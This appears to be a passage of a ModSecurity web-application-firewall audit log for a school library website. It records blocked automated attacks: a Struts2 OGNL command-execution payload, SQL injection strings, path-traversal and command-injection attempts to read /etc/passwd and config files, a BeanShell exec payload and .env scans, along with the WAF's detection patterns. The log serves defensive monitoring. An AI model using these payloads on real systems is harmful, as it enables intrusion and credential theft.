Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7f87dd68-Z-- --ec6cf037-A-- [04/Jun/2025:00:56:14 +0700] aD83Po0G58RZMmoh8H1KmwAAAIE 103.236.140.4 34996 103.236.140.4 8181 --ec6cf037-B-- GET /index.action?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding%5B0%5D),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd%5B0%5D).getInputStream()).useDelimiter(%23parameters.pp%5B0%5D),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp%5B0%5D,%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&pp=%5C%5CA&ppp=%20&encoding=UTF-8&cmd=cat%20/etc/passwd HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 198.252.110.114 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 Cookie: X-Forwarded-For: 198.252.110.114 Accept-Encoding: gzip X-Varnish: 173179306 --ec6cf037-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --ec6cf037-E-- --ec6cf037-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /index.action?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding%5B0%5D),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd%5B0%5D).getInputStream()).useDelimiter(%23parameters.pp%5B0%5D),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp%5B0%5D,%23w.print(%23str..."] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748973374334789 2341 (- - -) Stopwatch2: 1748973374334789 2341; combined=1113, p1=494, p2=580, p3=0, p4=0, p5=39, sr=77, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ec6cf037-Z-- --9f9a3a75-A-- [04/Jun/2025:01:12:25 +0700] aD87CZAN5Lj366RdGMwjbAAAAMA 103.236.140.4 41002 103.236.140.4 8181 --9f9a3a75-B-- POST /wsman HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http Content-Length: 1709 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:133.0) Gecko/20100101 Firefox/133.0 Content-Type: application/soap+xml;charset=UTF-8 X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 172988614 --9f9a3a75-C-- HTTP://perpustakaan.smkn22jakarta.sch.id/wsman/ http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem/ExecuteScript 102400 uuid:00B60932-CC01-0005-0000-000000010000 PT1M30S root/scx aWQ= 0 true --9f9a3a75-F-- HTTP/1.1 404 Not Found X-Frame-Options: SAMEORIGIN Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --9f9a3a75-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "TX:0=application/soap+xml"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1748974345690778 2877 (- - -) Stopwatch2: 1748974345690778 2877; combined=1894, p1=385, p2=1439, p3=26, p4=21, p5=23, sr=57, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9f9a3a75-Z-- --70908329-A-- [04/Jun/2025:02:11:30 +0700] aD9I4ghM7ynDNybXsoMjogAAAFI 103.236.140.4 36224 103.236.140.4 8181 --70908329-B-- GET /upgrade/detail.jsp/login/LoginSSO.jsp?id=1%20UNION%20SELECT%20md5(999999999)%20as%20id%20from%20HrmResourceManager HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 178.128.54.187 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.9 Safari/605.1.15 Cookie: X-Forwarded-For: 178.128.54.187 Accept-Encoding: gzip X-Varnish: 172601466 --70908329-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --70908329-E-- --70908329-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\x22'`](?:;? ?\\b(?:having|select|union)\\b ?[^\\s]| ?! ?[\\x22'`\\w])|\\b(?:c(?:onnection_id|urrent_user)|database)\\b ?\\(|\\bunion\\b[\\w(\\s]*?select\\b|\\buser ?\\(|\\bschema ?\\(|\\bselect.{0,399}?\\w?\\buser ?\\(|\\binto[\\s+]+(?:dump|o ..." at MATCHED_VAR. 
[file "/usr/local/apache/modsecurity-cwaf/rules/22_SQL_SQLi.conf"] [line "27"] [id "211650"] [rev "12"] [msg "COMODO WAF: Detects MSSQL code execution and information gathering attempts||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: 1 UNION SELECT md5(999999999) as id from HrmResourceManager found within MATCHED_VAR: 1 UNION SELECT md5(999999999) as id from HrmResourceManager"] [severity "CRITICAL"] [tag "CWAF"] [tag "SQLi"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748977890110716 3077 (- - -) Stopwatch2: 1748977890110716 3077; combined=1485, p1=410, p2=1039, p3=0, p4=0, p5=35, sr=71, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --70908329-Z-- --0846fb68-A-- [04/Jun/2025:02:11:30 +0700] aD9I4pAN5Lj366RdGMwxfgAAAMc 103.236.140.4 36234 103.236.140.4 8181 --0846fb68-B-- POST /webadm/?q=moni_detail.do&action=gragh HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 178.128.54.187 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 25 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.3 Safari/605.1.15 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 178.128.54.187 Cookie: X-Varnish: 172923256 --0846fb68-C-- type='|cat /etc/passwd||' --0846fb68-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0846fb68-E-- --0846fb68-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /webadm/?q=moni_detail.do&action=gragh"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748977890114699 1780 (- - -) Stopwatch2: 1748977890114699 1780; combined=567, p1=417, p2=119, p3=0, p4=0, p5=30, sr=89, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0846fb68-Z-- --00f93349-A-- [04/Jun/2025:02:11:30 +0700] aD9I4kSujXvW2xVCZlU22gAAAAk 103.236.140.4 36260 103.236.140.4 8181 --00f93349-B-- GET /vpn/user/download/client?ostype=../../../../../../../../../etc/passwd HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 178.128.54.187 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (CentOS; Linux i686; rv:134.0) Gecko/20100101 Firefox/134.0 Cookie: X-Forwarded-For: 178.128.54.187 Accept-Encoding: gzip X-Varnish: 171167884 --00f93349-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --00f93349-E-- --00f93349-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /vpn/user/download/client?ostype=../../../../../../../../../etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748977890115714 1754 (- - -) Stopwatch2: 1748977890115714 1754; combined=511, p1=290, p2=167, p3=0, p4=0, p5=54, sr=55, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --00f93349-Z-- --95b36401-A-- [04/Jun/2025:02:11:30 +0700] aD9I4pAN5Lj366RdGMwxgAAAAMg 103.236.140.4 36268 103.236.140.4 8181 --95b36401-B-- GET /export/classroom-course-statistics?fileNames[]=../../../../../../../etc/passwd HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 178.128.54.187 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Ubuntu; Linux i686; rv:133.0) Gecko/20100101 Firefox/133.0 Cookie: X-Forwarded-For: 178.128.54.187 Accept-Encoding: gzip X-Varnish: 173091831 --95b36401-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --95b36401-E-- --95b36401-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /export/classroom-course-statistics?fileNames[]=../../../../../../../etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748977890117469 1784 (- - -) Stopwatch2: 1748977890117469 1784; combined=471, p1=362, p2=87, p3=0, p4=0, p5=22, sr=69, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --95b36401-Z-- --a464026c-A-- [04/Jun/2025:02:11:30 +0700] aD9I4ghM7ynDNybXsoMjpgAAAEQ 103.236.140.4 36270 103.236.140.4 8181 --a464026c-B-- POST /zentao/user-login.html HTTP/1.0 Referer: https://perpustakaan.smkn22jakarta.sch.id/zentao/user-login.html Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 178.128.54.187 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 72 User-Agent: Mozilla/5.0 (Debian; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 178.128.54.187 Cookie: X-Varnish: 172923259 --a464026c-C-- account=admin'+and++updatexml(1,concat(0x1,md5(999999999)),1)+and+'1'='1 --a464026c-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a464026c-E-- --a464026c-H-- Message: Access denied with code 403 (phase 2). 
Pattern match "[\\[\\]\\x22',()\\.]{10}$|\\b(?:union\\sall\\sselect\\s(?:(?:null|\\d+),?)+|order\\sby\\s\\d{1,4}|(?:and|or)\\s\\d{4}=\\d{4}|waitfor\\sdelay\\s'\\d+:\\d+:\\d+'|(?:select|and|or)\\s(?:(?:pg_)?sleep\\(\\d+\\)|\\d+\\s?=\\s?(?:dbms_pipe\\.receive_message\\ ..." at ARGS_POST:account. [file "/usr/local/apache/modsecurity-cwaf/rules/22_SQL_SQLi.conf"] [line "66"] [id "218500"] [rev "18"] [msg "COMODO WAF: SQLmap attack detected||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: and '1'='1 found within ARGS_POST:account: admin' and updatexml(1,concat(0x1,md5(999999999)),1) and '1'='1"] [severity "CRITICAL"] [tag "CWAF"] [tag "SQLi"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748977890117674 2721 (- - -) Stopwatch2: 1748977890117674 2721; combined=1525, p1=300, p2=1191, p3=0, p4=0, p5=34, sr=54, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a464026c-Z-- --ba75750d-A-- [04/Jun/2025:02:11:30 +0700] aD9I4o0G58RZMmoh8H1cZgAAAIw 103.236.140.4 36258 103.236.140.4 8181 --ba75750d-B-- GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.release.ReleaseRepMngAction&method=updateDelFlag&TableSelectedID=1%27);WAITFOR+DELAY+%270:0:6%27-- HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 178.128.54.187 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:131.0) Gecko/20100101 Firefox/131.0 Cookie: X-Forwarded-For: 178.128.54.187 Accept-Encoding: gzip X-Varnish: 172647868 --ba75750d-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --ba75750d-E-- --ba75750d-H-- Message: Access denied with code 403 (phase 2). Match of "contains /wp-json/yoast/" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/22_SQL_SQLi.conf"] [line "17"] [id "211540"] [rev "14"] [msg "COMODO WAF: Blind SQL Injection Attack||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: WAITFOR DELAY found within REQUEST_URI: /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.release.ReleaseRepMngAction&method=updateDelFlag&TableSelectedID=1%27);WAITFOR+DELAY+%270:0:6%27--"] [severity "CRITICAL"] [tag "CWAF"] [tag "SQLi"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748977890119643 3035 (- - -) Stopwatch2: 1748977890119643 3035; combined=1840, p1=409, p2=1405, p3=0, p4=0, p5=26, sr=74, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ba75750d-Z-- --4e6a1c22-A-- [04/Jun/2025:02:11:30 +0700] aD9I4ghM7ynDNybXsoMjpQAAAFQ 103.236.140.4 36250 103.236.140.4 8181 --4e6a1c22-B-- POST /bsh.servlet.BshServlet HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 178.128.54.187 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 58 User-Agent: Mozilla/5.0 (X11; Linux i686; rv:126.0) Gecko/20100101 Firefox/126.0 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 178.128.54.187 Cookie: X-Varnish: 173148147 --4e6a1c22-C-- bsh.script=exec("cat+/etc/passwd");&bsh.servlet.output=raw --4e6a1c22-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4e6a1c22-E-- --4e6a1c22-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /bsh.servlet.BshServlet"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748977890115367 26137 (- - -) Stopwatch2: 1748977890115367 26137; combined=49510, p1=295, p2=113, p3=0, p4=0, p5=24562, sr=53, sw=0, l=0, gc=24540 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4e6a1c22-Z-- --40846d05-A-- [04/Jun/2025:02:11:31 +0700] aD9I440G58RZMmoh8H1caQAAAIc 103.236.140.4 36300 103.236.140.4 8181 --40846d05-B-- POST /sys/ui/extend/varkind/custom.jsp HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 178.128.54.187 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 42 User-Agent: Mozilla/5.0 (ZZ; Linux x86_64; rv:125.0) Gecko/20100101 Firefox/125.0 Accept: */* Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 178.128.54.187 Cookie: X-Varnish: 172923262 --40846d05-C-- var={"body":{"file":"file:///etc/passwd"}} --40846d05-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --40846d05-E-- --40846d05-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /sys/ui/extend/varkind/custom.jsp"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748977891094319 1048 (- - -) Stopwatch2: 1748977891094319 1048; combined=287, p1=212, p2=55, p3=0, p4=0, p5=20, sr=40, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --40846d05-Z-- --5df25f63-A-- [04/Jun/2025:02:11:32 +0700] aD9I5ESujXvW2xVCZlU23QAAAAM 103.236.140.4 36308 103.236.140.4 8181 --5df25f63-B-- POST /public/index.php/material/Material/_download_imgage?media_id=1&picUrl=./../config/database.php HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 178.128.54.187 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 5 User-Agent: Mozilla/5.0 (CentOS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 178.128.54.187 Cookie: X-Varnish: 171315398 --5df25f63-C-- "1":1 --5df25f63-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5df25f63-E-- --5df25f63-H-- Message: Access denied with code 403 (phase 2). Matched phrase "config/database.php" at ARGS:picUrl. [file "/usr/local/apache/modsecurity-cwaf/rules/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: config/database.php found within ARGS:picUrl: ../config/database.php"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748977892078191 3486 (- - -) Stopwatch2: 1748977892078191 3486; combined=1730, p1=466, p2=1229, p3=0, p4=0, p5=35, sr=74, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5df25f63-Z-- --3d0bf67b-A-- [04/Jun/2025:02:24:47 +0700] aD9L_whM7ynDNybXsoMl2wAAAE8 103.236.140.4 41150 103.236.140.4 8181 --3d0bf67b-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.115.46 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.115.46 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10.5; en-US; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15 Accept-Charset: utf-8 --3d0bf67b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3d0bf67b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748978687642477 783 (- - -) Stopwatch2: 1748978687642477 783; combined=325, p1=280, p2=0, p3=0, p4=0, p5=44, sr=82, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3d0bf67b-Z-- --2dfd0732-A-- [04/Jun/2025:02:53:37 +0700] aD9SwQhM7ynDNybXsoMo4QAAAEo 103.236.140.4 51336 103.236.140.4 8181 --2dfd0732-B-- GET /index.action?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding%5B0%5D),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd%5B0%5D).getInputStream()).useDelimiter(%23parameters.pp%5B0%5D),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp%5B0%5D,%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&pp=%5C%5CA&ppp=%20&encoding=UTF-8&cmd=cat%20/etc/passwd HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 198.252.110.114 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 198.252.110.114 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Fedora; Linux x86_64; rv:127.0) Gecko/20100101 Firefox/127.0 --2dfd0732-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2dfd0732-E-- --2dfd0732-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /index.action?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding%5B0%5D),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd%5B0%5D).getInputStream()).useDelimiter(%23parameters.pp%5B0%5D),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp%5B0%5D,%23w.print(%23str..."] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748980417814242 2632 (- - -) Stopwatch2: 1748980417814242 2632; combined=979, p1=441, p2=503, p3=0, p4=0, p5=35, sr=68, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2dfd0732-Z-- --ec7fe132-A-- [04/Jun/2025:03:08:31 +0700] aD9WPwhM7ynDNybXsoMqsQAAAEA 103.236.140.4 56586 103.236.140.4 8181 --ec7fe132-B-- GET /api/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 207.180.223.50 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 207.180.223.50 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Linux; Android 8.1.0; SM-G610M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36 Accept-Charset: utf-8 --ec7fe132-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ec7fe132-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
